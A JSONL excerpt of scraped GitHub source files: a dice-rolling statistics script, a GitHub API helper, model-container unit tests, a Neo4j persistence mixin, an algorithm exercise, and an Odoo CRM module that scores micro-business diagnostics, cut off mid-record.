+{"seq_id":"29590230616","text":"# roll x y-sided dice z times and get some stats\n# set number of dice in Cup class\n# set number of sides on die in Die class\n# set number of rolls in main()\n\nimport random\nfrom collections import Counter\nfrom matplotlib import pyplot as plt\n\n\nclass Cup:\n \"\"\" a cup to hold some dice \"\"\"\n def __init__(self):\n self.number_of_dice = 3\n self.dice = []\n\n def roll_dice(self):\n for die in self.dice:\n die.roll()\n\n def get_rolls(self):\n for die in self.dice:\n print(\"{}:{}\".format(self.dice.index(die) + 1, die.rolls))\n\n def set_dice(self):\n for die in self.dice:\n die.set_nums()\n\n def setup(self):\n self.dice = [Die() for i in range(self.number_of_dice)]\n self.set_dice()\n\n def get_roll_count(self):\n for die in self.dice:\n die.roll_count()\n\nclass Die:\n \"\"\" class for a single die \"\"\"\n def __init__(self):\n self.sides = 12\n self.numbers = []\n self.rolls = []\n self.rollcount = {}\n\n def set_nums(self):\n self.numbers = [i for i in range(1,self.sides+1)]\n\n def roll(self):\n a = random.choice(self.numbers)\n self.rolls.append(a)\n\n def roll_count(self):\n for i in range(1, self.sides +1):\n self.rollcount[i] = 0\n for k, v in Counter(self.rolls).items():\n self.rollcount[k] = v\n\n\ndef main():\n n_rolls = 1000\n cup = Cup()\n cup.setup()\n\n # roll the dice n times\n for i in range(n_rolls):\n cup.roll_dice()\n\n #cup.get_rolls()\n cup.get_roll_count()\n\n for die in cup.dice:\n a = []\n b = [i for i in range(1, cup.dice[0].sides +1)]\n x = die.rollcount\n\n for k, v in sorted(x.items()):\n a.append(x[k])\n\n fig,ax = plt.subplots()\n plt.bar(b,a)\n plt.title(\"dice {}\".format(cup.dice.index(die)+1))\n plt.show()\n\n\nmain()\n","repo_name":"airSipper/stats","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44589137915","text":"# github_api_client.py\n\nimport os\n\nGITHUB_API_TOKEN = os.environ.get(\"GITHUB_API_TOKEN\")\n\n\n# get repository names for a given github user from the github api\ndef get_repo_names(user):\n import requests\n\n url = f\"https://api.github.com/users/{user}/repos\"\n headers = {\"Authorization\": f\"token {GITHUB_API_TOKEN}\"}\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n return [repo[\"name\"] for repo in response.json()]\n","repo_name":"kaimhall/copilot","sub_path":"github_api_client.py","file_name":"github_api_client.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12161497408","text":"\"\"\"Test Model module\"\"\"\nfrom __future__ import absolute_import\n\nimport ruamel.yaml as yaml\n\nimport luchador.nn as nn\nfrom luchador.nn.model import Container\nfrom tests.unit import fixture\n\n\ndef _make_model(scope, model_config):\n with nn.variable_scope(scope):\n return nn.util.make_model(model_config)\n\n\ndef _get_models(scope, model_configs):\n models, container = [], Container()\n for i, cfg in enumerate(model_configs):\n model = _make_model(scope, cfg)\n models.append(model)\n container.add_model('model_{}'.format(i), model)\n return models, container\n\n\n_MODEL_DEFS = \"\"\"\nseq_1: &seq_1\n typename: Sequential\n args:\n input_config:\n typename: Input\n args:\n name: input_seq_1\n shape:\n - null\n - 4\n layer_configs:\n - typename: Dense\n args:\n n_nodes: 5\n scope: seq1/layer1/dense\n\nseq_2:\n typename: Sequential\n args:\n input_config:\n typename: Input\n args:\n name: input_seq_2\n shape:\n - null\n - 5\n layer_configs:\n - typename: Dense\n args:\n n_nodes: 6\n scope: seq2/layer1/dense\n\ncon_1:\n typename: Container\n args:\n input_config:\n typename: Input\n args:\n name: input_seq_3\n shape:\n - null\n - 8\n model_configs:\n - <<: *seq_1\n name: seq_1\n output_config:\n typename: Tensor\n name: seq1/layer1/dense/output\n\"\"\"\n\n_MODELS = yaml.round_trip_load(_MODEL_DEFS)\n\n\nclass TestContainer(fixture.TestCase):\n \"\"\"Test Container class\"\"\"\n def test_fetch_sequences(self):\n \"\"\"Container can fetch variables correctly\"\"\"\n models, container = _get_models(\n self.get_scope(),\n [_MODELS['seq_1'], _MODELS['seq_2']],\n )\n\n self.assertEqual(\n container.get_parameters_to_train(),\n (\n models[0].get_parameters_to_train() +\n models[1].get_parameters_to_train()\n )\n )\n self.assertEqual(\n container.get_parameters_to_serialize(),\n (\n models[0].get_parameters_to_serialize() +\n models[1].get_parameters_to_serialize()\n )\n )\n self.assertEqual(\n container.get_output_tensors(),\n (\n models[0].get_output_tensors() +\n models[1].get_output_tensors()\n )\n )\n self.assertEqual(\n container.get_update_operations(),\n (\n models[0].get_update_operations() +\n models[1].get_update_operations()\n )\n )\n\n def test_nested_container(self):\n \"\"\"Nested Container can fetch variables correctly\"\"\"\n models, container = _get_models(\n self.get_scope(),\n [_MODELS['con_1']],\n )\n model = models[0].models['seq_1']\n self.assertEqual(\n container.get_parameters_to_train(),\n model.get_parameters_to_train(),\n )\n self.assertEqual(\n container.get_parameters_to_serialize(),\n model.get_parameters_to_serialize(),\n )\n self.assertEqual(\n container.get_output_tensors(),\n model.get_output_tensors(),\n )\n self.assertEqual(\n container.get_update_operations(),\n model.get_update_operations(),\n )\n\n\nclass ModelRetrievalTest(fixture.TestCase):\n \"\"\"Test Model fetch mechanism\"\"\"\n def test_retrieval(self):\n \"\"\"Model is correctly retrieved\"\"\"\n scope1 = '{}/foo'.format(self.get_scope())\n scope2 = '{}/bar'.format(self.get_scope())\n\n name = 'baz'\n with nn.variable_scope(scope1):\n model1 = nn.model.Graph(name=name)\n self.assertIs(nn.get_model(name), model1)\n\n with nn.variable_scope(scope2):\n model2 = nn.model.Graph(name=name)\n self.assertIs(nn.get_model(name), model2)\n\n self.assertIs(nn.get_model('{}/{}'.format(scope1, name)), model1)\n self.assertIs(nn.get_model('{}/{}'.format(scope2, name)), model2)\n","repo_name":"mthrok/luchador","sub_path":"tests/unit/nn/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"32860175713","text":"from utils.Logger import logging\nfrom services.tool_services.neo_service import NeoService\nimport pandas as pd\n\nclass Neo4jMixin:\n\n def save_to_neo4j(self, label, x):\n if type(x) == pd.Series:\n x = x.to_dict()\n self.neoService.create(label, **x)\n\n def if_exists(self, label, _id):\n try:\n data = self.neoService.exec(\"match (n:{0}) where n._id=\\\"{1}\\\" return n\".format(label, _id)).data()\n except Exception as e:\n logging.exception(\"error occured when checking if exists\")\n return True\n\n if data:\n return True\n else:\n return False\n\n def save_relation(self, relation):\n relation_str = [ \"{0}:\\\"{1}\\\"\".format(k,v) for k,v in relation.items()]\n relation_str = \"{\" +\",\".join(relation_str) + \"}\"\n\n try:\n data = self.neoService.exec(\"match (n1:{0})-[r:{4}]-(n2:{1}) where n1._id =\\\"{2}\\\" and n2._id =\\\"{3}\\\" return r\".format(\n relation['from_type'],\n relation['to_type'],\n relation['from_id'],\n relation['to_id'],\n relation['name'])).data()\n if data:\n return\n\n except Exception as e:\n logging.exception(\"check duplicate error\")\n\n sql = \"match (n1:{0}), (n2:{1}) where n1._id =\\\"{2}\\\" and n2._id =\\\"{3}\\\" create (n1)-[r:{4} {5}]->(n2)\".format(\n relation['from_type'],\n relation['to_type'],\n relation['from_id'],\n relation['to_id'],\n relation['name'],\n relation_str)\n try:\n self.neoService.exec(sql)\n except Exception as e:\n logging.error(\"create relation error\")\n logging.exception(\"save relation error\")\n","repo_name":"Will-Holden/kb_demo","sub_path":"offline_processor/core/common/mixins/Neo4jMixin.py","file_name":"Neo4jMixin.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44778263826","text":"# k 번째 큰수\n# 현수는 1부터 100사이의 자연수가 적힌 N장의 카드를 가지고 있습니다.\n# 같은 숫자의 카드가 여러장 있을 수 있습니다. \n# 현수는 이 중 3장을 뽑아 각 카드에 적힌 수를 합한 값을 기록하려고 합니다.\n# 3장을 뽑을 수 있는 모든 경우를 기록합니다. \n# 기록한 값 중 K번째로 큰 수를 출력 하는 프로그램을 작성하세요.\n# 만약 큰 수부터 만들어진 수가 25 25 23 23 22 20 19......이고 K값이 3이라면 \n# K번째 큰 값 은 22입니다.\n# ▣ 입력설명\n# 첫 줄에 자연수 N(3<=N<=100)과 K(1<=K<=50) 입력되고, 그 다음 줄에 N개의 카드값이 입력 된다.\n# ▣ 출력설명\n# 첫 줄에 K번째 수를 출력합니다. K번째 수는 반드시 존재합니다.\n# ▣ 입력예제 1\n# 10 3\n# 13 15 34 23 45 65 33 11 26 42\n# ▣ 출력예제 1 \n# 143\n\n\nimport os\nimport sys\nimport time\n\npath=\"./3/\"\n\nfile_list=os.listdir(path)\nfile_list_in= [file for file in file_list if file.startswith('in')]\nfile_list_out= [file for file in file_list if file.startswith('out')]\nfile_list_in.sort()\nfile_list_out.sort()\n\ndef algorithm(length_input, count_input, list_input):\n sorted_list=list(reversed(sorted(list_input)))\n print(sorted_list)\n res=set()\n for i in range(length_input):\n for j in range(i+1, length_input):\n for k in range(j+1, length_input):\n res.add(sorted_list[i]+sorted_list[j]+sorted_list[k]) \n sorted_res=list(reversed(sorted(res)))\n print('답', sorted_res[count_input-1])\n \n # de_duplication_list = set(list_input)\n # sorted_list = list(reversed(sorted(de_duplication_list)))\n # print(sorted_list)\n\n \n\nfor file in file_list_in:\n sys.stdin=open(path + file, 'rt')\n n, k = map(int, input().split())\n a=sorted(list(map(int, input().split())), reverse=True)\n algorithm(n, k, a)\n# print(n, k)\n# print(a)\n \n\n\n","repo_name":"upatisariputa/python_algorithm","sub_path":"2/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34796020756","text":"# -*- coding: utf-8 -*-\nfrom odoo import fields, models, api, SUPERUSER_ID, _\nfrom odoo.exceptions import ValidationError\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import datetime, timedelta\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\nfrom lxml import etree\nimport json\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nRANGES = {\n 'incipiente': range(0, 48),\n 'confiable': range(48, 94),\n 'competente': range(94, 133),\n 'excelencia': range(133, 156)\n }\n\nCRM_DIAGNOSTIC_SELECTION_FIELDS = {\n 'doctype': 'tipo_documento',\n 'x_ubic': 'ubicacion',\n 'x_forma41': 'actividad_micronegocio',\n 'x_microneg': 'tipo_micronegocio',\n }\n\nANSWER_VALUES = {\n 'si': 5,\n 'en_proceso': 3,\n 'parcialmente' : 3,\n 'no': 1,\n 'cuenta_del_negocio' : 5,\n 'cuenta_personal' : 5,\n 'los_dos_tipos_cuenta' : 5,\n 'no_tiene' : 1,\n 'no_empleados' : 5,\n 'no_regulaciones' : 5,\n }\n\nTEXT_VALUATION = {\n 1: 'Incipiente',\n 2: 'Confiable',\n 3: 'Confiable',\n 4: 'Competente',\n 5: 'Excelencia'\n }\n\nM2M_FIELDS = ['x_neg6', 'x_neg5', 'x_mer_com32', 'x_mer_com34', 'x_forma51']\n\nSELECTION_FIELDS = [\n 'x_innova_org_1', 'x_innova_org_2', 'x_innova_org_3', 'x_innova_org_4', 'x_innova_org_5',\n 'x_innova_org_6', 'x_neg4','x_neg7', 'x_neg8', 'x_neg14', 'x_financiero18',\n 'x_financiero20', 'x_financiero21', 'x_financiero22', 'x_financiero23', 'x_financiero24',\n 'x_financiero25', 'x_mer_com30', 'x_mer_com31', 'x_mer_com38', 'x_mer_com39',\n 'x_forma44', 'x_forma45', 'x_forma46', 'x_forma47_1', 'x_forma49_1',\n 'x_neg16', 'x_financiero26', 'x_fin97n'\n ]\n\nSELECTION_FIELDS_WO_POINTS = [\n 'x_neg16', 'x_financiero26', 'x_fin97n'\n ]\n\nSUGGEST_VALUATION = {\n # 1\n 'x_innova_org_1': {\n 1: 'Remitir a talleres o cursos de innovación con el objetivo de prototipar y lanzar nuevos productos o servicios en su micronegocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 2\n 'x_innova_org_2': {\n 1: 'Buscar y explicar de nuevas herramientas tecnológicas que puedan mejorar los procesos o productividad del micronegocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 3\n 'x_innova_org_3': {\n 1: 'Acompañar y capacitar acerca de hábitos de planeación y organización, así como el diseño de un registro para llevar el cumplimiento de un plan y las metas',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 4\n 'x_innova_org_4': {\n 1: 'Acompañar y capacitar aspectos de planeación estratégica, así como la definición de una misión, visión y objetivos a largo plazo del micronegocio',\n 2: 'Revisar y hacer sugerencias acerca de la misión, visión y objetivos a largo plazo del micronegocio',\n 3: 'Revisar y hacer sugerencias acerca de la misión, visión y objetivos a largo plazo del micronegocio',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 5\n 'x_innova_org_5': {\n 1: 'Acompañar y capacitar acerca de la elaboración y seguimientos de los registros de inventario',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 6\n 'x_innova_org_6': {\n 1: 'Identificar alternativas y/o acciones necesarias para adecuar su espacio de trabajo',\n 2: 'Revisar y hacer sugerencias acerca de los cambios necesarios para adecuar correctamente su espacio de trabajo',\n 3: 'Revisar y hacer sugerencias acerca de los cambios necesarios para adecuar correctamente su espacio de trabajo',\n 4: '',\n 5: '',\n 'area': 'INNOVACION'\n },\n # 7\n 'x_neg4': {\n 1: 'Definir para quién está creando valor y quienes son sus clientes más importantes y la posibilidad de agrupar estos por medio de sus características, definir como aumentar su satisfacción',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 8 \n 'x_neg6': {\n 1: 'Ajustar los canales comerciales de acuerdo a la propuesta de valor y sus clientes',\n 2: 'Requiere explorar más canales , afinarlos y ponerlos a funcionar',\n 3: 'Requiere explorar más canales , afinarlos y ponerlos a funcionar',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 9\n 'x_neg7': {\n 1: 'Buscar apoyo en herramientas tecnológicas o registros donde pueda llevar el control y supervisión de los clientes para generar estrategias de fidelización y compra más frecuente',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 10\n 'x_neg8': {\n 1: '',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 14\n 'x_neg14': {\n 1: 'Gestionar acuerdos con proveedores',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 15\n 'x_neg16': {\n 0: 'Definir el valor que quiere entregar a sus clientes, clarificar que problemas o dolores quiere ayudar a resolver, validar si los productos y/o servicios ofrecidos, realmente solucionan problemas o satisfacen las necesidades de los clientes',\n 'area': 'MODELO DE NEGOCIO'\n },\n # 17\n 'x_financiero18': {\n 1: 'Orientar al propietario del negocio acerca de los hábitos positivos financieros y la importancia de llevar registros económicos',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 19\n 'x_financiero20': {\n 1: 'Orientar al propietario del negocio acerca de los hábitos positivos financieros y la importancia de llevar registros económicos',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 20\n 'x_financiero21': {\n 1: 'Acompañar y explicar el proceso para calcular el punto de equilibrio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 21\n 'x_financiero22': {\n 1: 'Acompañar y explicar los beneficios de la Inclusión financiera para el acceso a los productos del sistema bancario',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 22\n 'x_financiero23': {\n 1: 'Explicar procesos de agrupación y reestructuración de los pagos de la deuda, idealmente para que todo quede asociado a un solo acreedor',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 23\n 'x_financiero24': {\n 1: 'Remitir a un asesor de una entidad bancaria para que realicen el proceso de asesoramiento y determinación del monto máximo de endeudamiento',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 24\n 'x_financiero25': {\n 1: 'Acompañar y capacitar aspectos de educación financiera para la búsqueda e implementación de una herramienta (Excel, SIIGO) que permita realizar los registros contables del negocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FINANZAS'\n },\n # 25\n 'x_financiero26': {\n 0: 'Remitir a la Cooperativa Minuto de Dios',\n 'area': 'FINANZAS'\n },\n # 27\n 'x_neg5': {\n 1: 'Definir el valor que quiere entregar a sus clientes, clarificar que problemas o dolores quiere ayudar a resolver, validar si los productos y/o servicios ofrecidos, realmente solucionan problemas o satisfacen las necesidades de los clientes',\n 2: 'Validar los productos y/o servicios ofrecidos, para lograr asegurar que realmente solucionan problemas o satisfacen las necesidades de los clientes',\n 3: 'Validar los productos y/o servicios ofrecidos, para lograr asegurar que realmente solucionan problemas o satisfacen las necesidades de los clientes',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 28\n 'x_mer_com30': {\n 1: 'Acompañar en el diseño de estrategias para la visibilidad de los productos o servicios',\n 2: 'Acompañar en el diseño de estrategias para la visibilidad de los productos o servicios',\n 3: 'Acompañar en el diseño de estrategias para la visibilidad de los productos o servicios',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 29\n 'x_mer_com31': {\n 1: 'Acompañar en el diseño de estrategias para la visibilidad de los productos o servicios',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 30\n 'x_mer_com32': {\n 1: 'Acompañar en la identificación de oportunidades de mercado y nuevos segmentos de clientes',\n 2: 'Acompañar en la definición del plan de marketing',\n 3: 'Acompañar en la definición del plan de marketing',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 32\n 'x_mer_com34': {\n 1: 'Acompañar en el diseño de estrategias para la visibilidad de los producto o servicios',\n 2: 'Acompañar en la definición del plan de marketing',\n 3: 'Acompañar en la definición del plan de marketing',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 34\n 'x_mer_com38': {\n 1: 'Acompañar en el uso de redes sociales para promocionar y posicionar su negocio y productos',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 35\n 'x_mer_com39': {\n 1: 'Acompañar en el uso de herramientas digitales para promoción de sus productos (uso de redes sociales o el desarrollo de páginas web)',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'MERCADEO Y COMERCIALIZACION'\n },\n # 36\n 'x_forma44': {\n 1: 'Acompañar y asesorar en los procesos para la formalización del negocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 37\n 'x_forma45': {\n 1: 'Acompañar y asesorar en los procesos para la formalización del negocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 38\n 'x_forma46': {\n 1: 'Acompañar y asesorar en los procesos para la formalización del negocio',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 40\n 'x_forma47_1': {\n 1: 'Acompañar y asesorar en los procesos de pagos parafiscales para sus empleados',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 43\n 'x_forma49_1': {\n 1: 'Revisar las regulaciones del sector y plantear con el propietario un plan de trabajo para empezar a cumplirlas',\n 2: '',\n 3: '',\n 4: '',\n 5: '',\n 'area': 'FORMALIZACION'\n },\n # 44\n 'x_fin97n': {\n 0: 'Remitir al programa de Empleabilidad',\n 'area': 'FORMALIZACION'\n },\n}\n\nclass CrmLead(models.Model):\n _inherit = 'crm.lead'\n\n\n crm_lead_id = fields.One2many(\n 'crm.diagnostic',\n 'lead_id',\n string='CRM Diagnostic',\n copy=False)\n\n mentors = fields.Many2one(\n 'res.partner',\n string='Mentores',\n )\n\n coordinador = fields.Many2one(\n 'res.users',\n string='Coordinador'\n )\n diagnostico = fields.Selection(\n selection=[\n ('competitividad', 'Nivel de competitividad'),\n ('incipiente', 'Incipiente'),\n ('aceptable', 'Aceptable'),\n ('confiable', 'Confiable'),\n ('competente', 'Competente'),\n ('excelencia', 'Excelencia')],\n string='Diagnostico'\n )\n # computed fields\n first_module_ready = fields.Boolean(\n compute='compute_first_module'\n )\n second_module_read = fields.Boolean(\n compute='compute_second_module'\n )\n third_module_ready = fields.Boolean(\n compute='compute_third_module'\n )\n four_module_read = fields.Boolean(\n compute='compute_four_module'\n )\n current_user = fields.Many2one(\n 'res.users',\n compute='get_current_user'\n )\n root_current_user = fields.Boolean(\n compute='current_user_is_root'\n )\n current_user_facilitator = fields.Boolean(\n compute='current_user_is_facilitator'\n )\n current_user_mentor = fields.Boolean(\n compute=\"current_user_is_mentor\"\n )\n current_user_admin = fields.Boolean(\n compute=\"current_user_is_admin\"\n )\n\n social_plan = fields.Boolean(default = False)\n\n facilitator_role = fields.Char(compute=\"get_facilitator_role\")\n\n show_action_set_rainbowman = fields.Boolean(compute=\"compute_show_action_set_rainbowman\")\n \n\n def confirm_social_plan(self):\n stage_after = self.env['crm.stage'].search([('stage_after_confirm_social_plan', '=', True)])\n for lead in self:\n lead.social_plan = True\n if stage_after:\n lead.with_user(SUPERUSER_ID).stage_id = stage_after[0]\n\n # returning an action to go to crm.diagnostic form view related to lead\n def action_crm_diagnostic_view(self):\n print(not self.is_cordinator() or not self.is_orientador()) and (not self.first_module_ready or not self.second_module_read or not self.third_module_ready, \"esto es lo que quieres ver andres?\")\n for record in self:\n print(not record.is_cordinator() or not record.is_orientador()) and (not record.first_module_ready or not record.second_module_read or record.third_module_ready, \"esto es lo que quieres ver andres?\")\n\n # we avoid to execute the diagnostic whether question modules haven't executed yet\n if (not record.is_cordinator() or not record.is_orientador()) and (not record.first_module_ready or not record.second_module_read or not record.third_module_ready):\n raise ValidationError('Para realizar el diagnostico, debe responder las preguntas de los 3 modulos.')\n crm_diagnostic_vals = record.getting_values_to_crm_diagnostic()\n crm_diagnostic_id = self.env['crm.diagnostic'].create(crm_diagnostic_vals)\n crm_diagnostic_id._get_lines_for_areas()\n _logger.info(\"&\"*500)\n _logger.info(crm_diagnostic_id.read())\n crm_diagnostic_id.valuacion_diagnostico = record.diagnostico\n return record.action_to_return_to_crm_diagnostic(crm_diagnostic_id)\n\n # return a dic values for crm.diagnostic\n def getting_values_to_crm_diagnostic(self):\n for lead in self:\n dic_vals = {\n 'lead_id': lead.id,\n 'fecha': fields.Date.today(),\n 'nombre_negocio': lead.x_nombre_negocio,\n 'nombre_propietario': lead.x_nombre,\n 'numero_identificacion': lead.x_identification,\n 'crm_diagnostic_line_ids': []\n }\n dic_sel_fields = lead.getting_selection_fields_to_dignostic_form(lead)\n dic_vals.update(dic_sel_fields)\n results = lead.prepare_diagnostic_lines(lead)\n innovation = []\n bussiness = []\n formalization = []\n marketing = []\n finance = []\n\n for result in results:\n if 'INNOVACION' in result:\n innovation.append(result.get('INNOVACION'))\n if 'MODELO DE NEGOCIO' in result:\n bussiness.append(result.get('MODELO DE NEGOCIO'))\n if 'FORMALIZACION' in result:\n formalization.append(result.get('FORMALIZACION'))\n if 'MERCADEO Y COMERCIALIZACION' in result:\n marketing.append(result.get('MERCADEO Y COMERCIALIZACION'))\n if 'FINANZAS' in result:\n finance.append(result.get('FINANZAS'))\n\n if len(innovation):\n puntaje1 = 0\n count1 = 0\n for dic in innovation:\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje1 += int(dic.get('puntaje'))\n count1 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n puntaje1 += int(dic[1].get('puntaje'))\n count1 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion1'] = puntaje1\n\n if puntaje1 in range(0,10):\n valoracion = 'Incipiente'\n elif puntaje1 in range(10,19):\n valoracion = 'Confiable'\n elif puntaje1 in range(19,27):\n valoracion = 'Competente'\n elif puntaje1 > 26:\n valoracion = 'Excelencia'\n dic_vals['valoracion_innovation'] = valoracion\n \n if len(bussiness):\n puntaje2 = 0\n count2 = 0\n for dic in bussiness:\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje2 += int(dic.get('puntaje'))\n count2 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n puntaje2 += int(dic[2].get('puntaje'))\n count2 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion2'] = puntaje2\n\n if puntaje2 in range(0,9):\n valoracion = 'Incipiente'\n elif puntaje2 in range(9,16):\n valoracion = 'Confiable'\n elif puntaje2 in range(16,22):\n valoracion = 'Competente'\n elif puntaje2 > 21:\n valoracion = 'Excelencia'\n dic_vals['valoracion_neg'] = valoracion\n \n if len(formalization):\n puntaje3 = 0\n count3 = 0\n for dic in formalization:\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje3 += int(dic.get('puntaje'))\n count3 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n puntaje3 += int(dic[2].get('puntaje'))\n count3 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion3'] = puntaje3\n\n if puntaje3 in range(0,9):\n valoracion = 'Incipiente'\n elif puntaje3 in range(9,16):\n valoracion = 'Confiable'\n elif puntaje3 in range(16,23):\n valoracion = 'Competente'\n elif puntaje3 > 22:\n valoracion = 'Excelencia'\n dic_vals['valoracion_forma'] = valoracion\n\n if len(marketing):\n puntaje4 = 0\n count4 = 0\n for dic in marketing:\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje4 += int(dic.get('puntaje'))\n count4 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n puntaje4 += int(dic[2].get('puntaje'))\n count4 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion4'] = puntaje4\n\n if puntaje4 in range(0,12):\n valoracion = 'Incipiente'\n elif puntaje4 in range(10,22):\n valoracion = 'Confiable'\n elif puntaje4 in range(19,31):\n valoracion = 'Competente'\n elif puntaje4 > 30:\n valoracion = 'Excelencia'\n dic_vals['valoracion_merca'] = valoracion\n\n if len(finance):\n puntaje5 = 0\n count5 = 0\n for dic in finance:\n count5 += 1\n if type(dic).__name__ == 'dict':\n if 'puntaje' in dic.keys():\n print(dic.get('puntaje'))\n puntaje5 += int(dic.get('puntaje'))\n count5 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n elif type(dic).__name__ == 'tuple':\n if 'puntaje' in dic[2].keys():\n puntaje5 += int(dic[2].get('puntaje'))\n count5 += 1\n dic_vals['crm_diagnostic_line_ids'].append((0, 0, dic))\n dic_vals['calificacion5'] = puntaje5\n \n if puntaje5 in range(0,13):\n valoracion = 'Incipiente'\n elif puntaje5 in range(13,25):\n valoracion = 'Confiable'\n elif puntaje5 in range(25,35):\n valoracion = 'Competente'\n elif puntaje5 > 34:\n valoracion = 'Excelencia'\n dic_vals['valoracion_finanza'] = valoracion\n\n _logger.info(\"?\"*500)\n _logger.info(dic_vals)\n return dic_vals\n\n @api.model\n def _get_valoracion_bio(self, puntaje):\n if puntaje <= 2:\n valoracion = 'Incipiente'\n elif puntaje == 3:\n valoracion = 'Confiable'\n elif puntaje == 4:\n valoracion = 'Competente'\n elif puntaje >= 5:\n valoracion = 'Excelencia'\n\n return valoracion\n\n\n # getting str values from selection fields\n @api.model\n def getting_selection_fields_to_dignostic_form(self, lead):\n dic_fields = lead.read()[0]\n dic_selection_fields = {}\n for k, v in CRM_DIAGNOSTIC_SELECTION_FIELDS.items():\n for key in dic_fields:\n if k == key:\n dic_selection_fields[v] = dict(lead._fields[k].selection).get(getattr(lead, k))\n return dic_selection_fields\n\n # return a list of values to create diagnostic lines\n @api.model\n def prepare_diagnostic_lines(self, lead):\n lines = []\n lines_dict = []\n dic_fields = lead.read()[0]\n _fields = self.env['ir.model.fields'].search(\n [('name', 'ilike', 'x_'),\n ('model_id.model', '=', lead._name)]).filtered(\n lambda f : f.name.startswith('x_'))\n puntaje = 0\n for field in _fields:\n field_value = dic_fields.get(field.name)\n # TODO\n # validating if the field value is in ANSWER_VALUES\n # we obtain certain values from lead on its field what is iterating\n if field.ttype == 'selection' and field.name in SELECTION_FIELDS:\n if field_value in ANSWER_VALUES:\n answer = dict(lead._fields[field.name].selection).get(getattr(lead, field.name))\n score = ANSWER_VALUES.get(field_value)\n if field.name in SELECTION_FIELDS_WO_POINTS and answer == 'Si':\n score = 0\n valuation = 